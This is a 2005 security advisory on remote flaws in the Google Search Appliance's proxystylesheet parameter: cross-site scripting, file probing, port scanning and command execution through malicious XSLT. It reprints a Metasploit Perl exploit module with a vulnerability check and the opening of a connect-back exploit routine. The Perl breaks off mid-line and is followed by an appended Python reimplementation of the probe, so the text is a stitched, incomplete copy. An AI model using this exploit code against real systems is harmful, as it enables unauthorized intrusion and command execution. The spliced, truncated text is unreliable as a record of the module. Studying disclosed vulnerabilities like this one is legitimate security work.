
Google Search Appliance ProxyStyleSheet Multiple Remote Security Vulnerabilities

[ Source: unknown | Author: neeao | Posted: 2005-11-24 9:10:09 ]


Release date: 2005-11-21
Update date: 2005-11-21

Affected systems:
Google Search Appliance
Google Mini Search Appliance
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 15509

The Google Search Appliance is an enterprise-class hardware search appliance. Its search interface uses the proxystylesheet form variable to decide which stylesheet is applied to the search results. The value of this variable may be either a local file name or an HTTP URL.

Multiple security vulnerabilities exist in the way the Google Search Appliance handles the proxystylesheet variable. A remote attacker can exploit them to obtain system information without authorization or to execute arbitrary JavaScript in the browsers of search users.

An attacker can supply malicious JavaScript code as the value of the proxystylesheet variable. The appliance looks for a local file of that name and, when it is not found, displays an error message that echoes the supplied value, including the JavaScript (reflected cross-site scripting).

By supplying a path relative to the stylesheet directory, an attacker can determine whether an arbitrary file exists on the system, because the error message returned by the server reveals whether a valid path was given. This can be used, for example, to identify the underlying operating system and kernel version.

Because the server returns different error messages when the stylesheet fetch hits an open port versus a closed port, an attacker can perform a basic port scan of a target system by requesting HTTP URLs that point at that system and at individual ports on it.

An attacker can perform a cross-site scripting attack by creating a malicious XSLT stylesheet and specifying its URL in the proxystylesheet parameter. The appliance downloads the stylesheet and delivers the malicious JavaScript to the user performing the search.

An attacker can execute arbitrary Java class methods on the appliance by creating a malicious XSLT stylesheet, which allows system commands to be run with the privileges of an unprivileged user. Combined with a vulnerable kernel version, this can lead to a remote root shell.

<*Source: H D Moore (hdm@metasploit.com)

Link: http://marc.theaimsgroup.com/?l=bugtraq&m=113260745222998&w=2
*>

Test method:
--------------------------------------------------------------------------------

WARNING

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::google_proxystylesheet_exec;

use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket;
use IO::Select;
my $advanced = { };

my $info =
{
'Name' => 'Google Appliance ProxyStyleSheet Command Execution',
'Version' => '$Revision: 1.2 $',
'Authors' => [ 'H D Moore <hdm [at] metasploit.com>' ],

'Description' =>
Pex::Text::Freeform(qq{
This module exploits a feature in the Saxon XSLT parser used by
the Google Search Appliance. This feature allows for arbitrary
java methods to be called. Google released a patch and advisory to
their client base in August of 2005 (GA-2005-08-m). The target appliance
must be able to connect back to your machine for this exploit to work.
}),

'Arch' => [ ],
'OS' => [ ],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [ 1, 'HOST', 'The address of the Google appliance'],
'RPORT' => [ 1, 'PORT', 'The port used by the search interface', 80],
'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ],
'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
'HTTPADDR' => [ 0, 'HOST', 'The address that can be used to connect back to this system'],
},
'Payload' =>
{
'Space' => 1024,
'Keys' => [ 'cmd' ],
},
'Refs' =>
[
['OSVDB', 20981],
],
'DefaultTarget' => 0,
'Targets' =>
[
[ 'Google Search Appliance']
],
'Keys' => [ 'google' ],

'DisclosureDate' => 'Aug 16 2005',
};

sub new
{
my $class = shift;
my $self;

$self = $class->SUPER::new(
{
'Info' => $info,
'Advanced' => $advanced,
},
@_);

return $self;
}

sub Check {
my $self = shift;
my $s = $self->ConnectSearch;

if (! $s) {
return $self->CheckCode('Connect');
}

my $url =
"/search?client=". Pex::Text::AlphaNumText(int(rand(15))+1). "&".
"site=".Pex::Text::AlphaNumText(int(rand(15))+1)."&".
"output=xml_no_dtd&".
"q=".Pex::Text::AlphaNumText(int(rand(15))+1)."&".
"proxystylesheet=http://".Pex::Text::AlphaNumText(int(rand(32))+1)."/";

$s->Send("GET $url HTTP/1.0\r\n\r\n");
my $page = $s->Recv(-1, 5);
$s->Close;

if ($page =~ /cannot be resolved to an ip address/) {
$self->PrintLine("[*] This system appears to be vulnerable >:-)");
return $self->CheckCode('Confirmed');
}

if ($page =~ /ERROR: Unable to fetch the stylesheet/) {
$self->PrintLine("[*] This system appears to be patched");
}

$self->PrintLine("[*] This system does not appear to be vulnerable");
return $self->CheckCode('Safe');
}

sub Exploit
{
my $self = shift;
my ($s, $page);

# Request the index page to obtain a redirect response
$s = $self->ConnectSearch || return;
$s->Send("GET / HTTP/1.0\r\n\r\n");
$page = $s->Recv(-1, 5);
$s->Close;

# Parse the redirect to get the client and site values
my ($goog_site, $goog_clnt) = $page =~ m/^location.*site=([^\&]+)\&.*client=([^\&
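The following is an added example, not part of the advisory and not code from the Metasploit module: a standard-library Python 3 reimplementation of the module's Check() oracle (the probe URL with an unresolvable stylesheet host, and the two response strings the module matches on), together with the Location-header parsing that the Exploit sub begins with. The sample response bodies, the sample Location value and the host names below are constructed for illustration, not captured from a real appliance; parameter order in the Location header is not assumed, whereas the module's regex requires site before client.

```python
"""Added example (standard-library Python 3), not code from the advisory or
from the Metasploit module: the Check() oracle and the redirect parsing that
the Exploit sub begins, written so the classification can be run offline."""

import random
import string
import http.client
from urllib.parse import urlencode, urlsplit, parse_qs

# Strings the Perl module matches on: the first means the appliance tried to
# resolve the bogus stylesheet host (server-side fetch still enabled), the
# second is what a patched appliance returns.
VULNERABLE_MARKER = b"cannot be resolved to an ip address"
PATCHED_MARKER = b"ERROR: Unable to fetch the stylesheet"


def _alnum(n):
    """Random alphanumeric token, like Pex::Text::AlphaNumText."""
    return "".join(random.choices(string.ascii_letters + string.digits, k=n))


def build_check_url(client=None, site=None, q=None, host=None):
    """Build the probe URL used by Check(): random client/site/q values and a
    proxystylesheet pointing at a random, unresolvable host. Unlike the Perl
    module, the query is percent-encoded by urlencode()."""
    params = {
        "client": client or _alnum(random.randint(1, 15)),
        "site": site or _alnum(random.randint(1, 15)),
        "output": "xml_no_dtd",
        "q": q or _alnum(random.randint(1, 15)),
        "proxystylesheet": "http://%s/" % (host or _alnum(random.randint(1, 32))),
    }
    return "/search?" + urlencode(params)


def classify_response(body):
    """Classify a raw HTTP response body the way Check() does."""
    if VULNERABLE_MARKER in body:
        return "vulnerable"
    if PATCHED_MARKER in body:
        return "patched"
    return "unknown"


def parse_search_redirect(location):
    """Pull the site and client values out of the Location header the
    appliance sends for GET /; the Exploit sub reuses them in its requests.
    Parsing the query properly does not depend on parameter order."""
    qs = parse_qs(urlsplit(location).query)
    return qs.get("site", [None])[0], qs.get("client", [None])[0]


def check_appliance(host, port=80, timeout=5):
    """Live version of Check(): one GET against the search interface."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", build_check_url(), headers={"Host": host})
        return classify_response(conn.getresponse().read())
    finally:
        conn.close()


# Constructed sample responses (not captured from a real appliance).
SAMPLE_VULNERABLE = (b"<html><body>Error: host k3jd9 cannot be resolved to an "
                     b"ip address</body></html>")
SAMPLE_PATCHED = b"ERROR: Unable to fetch the stylesheet\n"
SAMPLE_OTHER = b"<html><body>no results</body></html>"
SAMPLE_LOCATION = ("http://gsa.example.test/search?site=default_collection"
                   "&client=default_frontend&output=xml_no_dtd&q=")


if __name__ == "__main__":
    for name, body in [("vulnerable", SAMPLE_VULNERABLE),
                       ("patched", SAMPLE_PATCHED), ("other", SAMPLE_OTHER)]:
        print(name, "->", classify_response(body))
    print(parse_search_redirect(SAMPLE_LOCATION))
```

Running the file classifies the three constructed bodies and prints the parsed site/client pair; check_appliance() performs the live probe against a real host and port. Note that, as in the Perl module, a body without either marker is reported as not vulnerable even though it may simply be an unexpected page.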
